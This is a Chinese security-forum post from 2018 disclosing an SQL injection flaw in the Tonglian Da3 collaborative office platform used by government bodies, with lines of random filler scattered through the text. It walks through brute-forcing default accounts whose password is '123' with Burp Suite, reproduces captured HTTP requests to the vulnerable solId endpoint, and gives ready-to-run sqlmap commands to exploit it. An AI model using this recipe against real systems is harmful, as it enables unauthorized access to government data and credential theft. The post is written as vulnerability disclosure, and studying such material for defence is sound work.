找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1543|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 e: m& C* O. x$ r3 {& _' j
5 i" P2 O/ L8 ^6 u

! ?( B& V7 F3 }+ @( O

( T$ D* o) |( D5 W( k8 R 平台简介:- l* h2 m% X* U1 j7 n# h8 e

+ S3 b" S% S) Q- a, h' g2 ]

/ K/ [. j8 f, }( e* Y  : l% Z, t; {6 A

# V! |8 ]( c# l8 _4 R

' g& ^+ v8 F0 b# E 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* S/ _; E/ ]# O: x4 z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* b) {3 [' l" N x0 ^+ B 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 r9 s: X" x4 M8 I8 o- J& i, G

. |/ |; |4 W/ w6 F' Q

3 S( n( V- r* c# g" x   / r1 e" d6 b% }1 ]4 j9 w

; ^, }5 A) p w, q: T7 v. ^0 F% `2 S

$ p4 t5 @; R+ r, j1 \9 M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 2 _9 X) f* P' B4 H6 g3 z* R

) d% t* ]3 h* ^7 e

# ~! V1 }( r( c0 C4 H" K4 N; P- |8 w  8 o! Z/ {0 R# T' G

9 A& `6 V7 f( A B7 K1 a% _

2 y/ F8 v! K# l; E" l http://1.1.1.1:7197/cap-aco/#(案例2-)4 R) Y, ?5 E- T) n- Z

4 v2 D: j9 v2 A' l9 Y2 b

! F# V, a A% ~( d http://www.XXOO.com (案例1-官网网站) $ s2 [4 |, l' s; n2 l

! Q0 M& I0 Z" t( x

# e" L+ x- f6 D% z+ G/ d   ; ], Z0 k V4 d, [' B& w3 }. s' u

5 x, F; E! `+ R$ t/ \$ j3 z3 s

/ E. C6 q) m& V4 P: K3 h: s 漏洞详情: & t% F8 a& B5 O3 a4 [) z6 [' r

# t# ~$ @' L/ I/ F

5 N$ `+ F1 r" N/ o3 G Y4 _  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试; A" \7 n* x& F2 l: Y

( t( _; Q% B' q

$ r( V- ^2 S/ s, ~) `      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: - \" C3 j3 E" N+ X

+ A. ?% m! |0 S; N

! ~" |( ?3 M) q% v7 K2 F* J9 _8 m   ' K: ], r2 c" z

5 c) x/ ?/ u/ y, W8 A% u' ]5 k/ z! W

3 \. ~; `( B: {: E" _   / y. {6 q/ l- i0 T. w0 n

) c9 b, }* S8 \" s) |9 h' T4 C

) d3 R$ a M/ i) e# v# s status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: . n& n/ b. [1 T- i1 U: A2 P

1 S2 ?/ A+ s3 }- T# x/ K, S

2 B* Z0 z; ~7 d3 H& y 1、案例1-官方网站 3 d% C6 ^+ m# n: E; d7 f

' o1 n3 k6 o( G1 Z

" m- i O/ v e; q7 H: Q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 x2 K! `8 g! _

5 ?* |" b+ |6 b

8 a' x# v) T$ D& @- N, P* A Host: www.XXOO.com$ f6 i* N, T/ ^3 a

( l `: h9 _! ^4 |

: |7 d8 ?% p$ r* v# g Proxy-Connection: Keep-Alive / Y$ w5 ?+ j9 t( H1 O! n/ _

: z1 T( c4 v* R! N: q

* ]1 g U2 I' P- O w Accept: application/json, text/javascript, */*; q=0.011 q) O3 C7 v# ^

# h6 N. X; @9 Q8 F

! r% E3 w2 Q9 p9 r" R Accept-Language: zh-CN , P9 i$ C) F; B4 c9 X- c- L) h

; d$ D8 S- q1 }: L6 B/ k* O! m

6 p5 k$ t! T% x7 @. [- o& I Content-Type: application/json 6 x5 K5 r, y N8 C$ a# F* g2 |$ h

; B/ Q4 r& j) b% V& h

( [& N) h2 T5 U% W& ~$ _! ~2 q User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko . u/ x9 [; m( I5 T m u6 n

+ F5 x! c Z6 M! f& s6 u1 z

" u9 o4 T+ j% I& r6 i1 r X-Requested-With: XMLHttpRequest' N. k7 t: e$ n# u9 j& Q

/ E8 }, Z( t) p9 ~1 i

C( T1 C5 }; U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0024 {4 r s5 l5 V

) V- j: ^% b* `3 e

6 v9 [3 S X3 z _3 \" A2 L Accept-Encoding: gzip, deflate, sdch; S: k- J; o) [, g+ G2 o

! v7 V& [: u9 h% o, I

( i2 Z! U' s S/ \( N3 c4 ~ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( e* d. k' m0 _% h1 @0 E& J. k1 V! w

6 Z( k, J4 j7 {; h0 n, _

- ]( `$ s' w/ V% ~: { 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 C. n0 j# r! q% H3 \ W5 {* n

2 j4 B5 ~1 l6 P

# f& N- C7 ^ V: R! K r  ( d/ P+ N U" O7 o$ y

6 N5 `( Z, {; K, y

$ T: J6 v+ Y) E; v, u5 Z- g  3 o w X8 r- N

* r! b- ?/ X& |' g9 \* S

1 c) y7 W3 Q: _8 b   4 N4 s/ }) ]& S7 i. L+ U; d

3 s2 x) M3 E6 G, q# ~ X( q

6 ] `5 k1 J+ M2 h/ M   & p. Y2 j6 N: H4 _! m+ y

# Y* Y! _- p5 {

' |# p& j! n5 x3 Y& P7 t   / Y0 H3 E6 c% _: L" m

1 g- b" b0 k4 z

7 D2 s8 }& r! A5 m- q5 b. c 2、案例2-某天河云平台 4 {4 U& Y6 G( x6 j$ Q/ W, P

$ J/ S9 ^. [5 ?- c# W- \

1 @7 H1 S! S! t2 r3 w GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1/ n! i5 |5 |# ]2 z( v7 a5 h- X

0 } u6 R; s+ M2 z- Q: C% a! Q

/ i. P+ n6 L4 [. \ Host: 1.1.1.:7197 1 c/ ?' f5 ]7 G4 Z# r$ }) H! s

) d1 O* b0 a. w6 ` H: F

. K" K( U' n6 r3 w8 b3 }9 n X Accept: application/json, text/javascript, */*; q=0.01 # ?% p: u& n3 u6 [4 r

0 W) [/ f$ D9 H8 C

! C3 w+ t" t8 [; H X-Requested-With: XMLHttpRequest " a/ j5 d+ x, Y' k8 y5 n

& c4 J2 G+ C; T* Y: w1 W. f8 i

) }& m# t" Y: o; E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 : g+ G# S/ ~# Y) E% {3 t8 A8 ]( i

0 T; D, r4 }! |* z* n8 ]" d

( L& N) h! S( o! N8 B Content-Type: application/json: f" X5 O a# s* F( Y0 A9 z

7 u! a% k- O! t* n3 [/ A1 U

8 M0 P3 b, r9 b( E8 ~ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ( [, q4 ]: G: k( t, r

3 ]- p6 X# J# ?5 z

( L( F* }8 a! s3 i Accept-Language: zh-CN,zh;q=0.8- ^ D/ \- W$ V2 h5 |6 r7 }+ ]0 H

2 S) w4 a9 V0 t( a0 s

: Z9 B! F1 q. g! N& J Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 " V) J) G+ o. Z/ g$ ?

2 Z# t6 J4 ~, _; L6 I1 ?6 O

0 |! D: V4 X: O$ R5 P( s Connection: close & S8 J7 Q0 ^% d1 e+ \

8 C4 }1 q9 e2 c3 \

- h. [) ^; N+ I) K& x 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:7 L1 b* @; E4 f8 S

+ j m5 K' o) K5 R$ }& A

' M; i7 l" ~: E/ D   ( K, H8 O- s) ]$ n' ?

( w* [1 ?1 K' f) Z f; Y

, Z) I* @- {& N/ M) |; P& m& d! Y
( I1 m! V$ s2 C% l0 h7 W

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表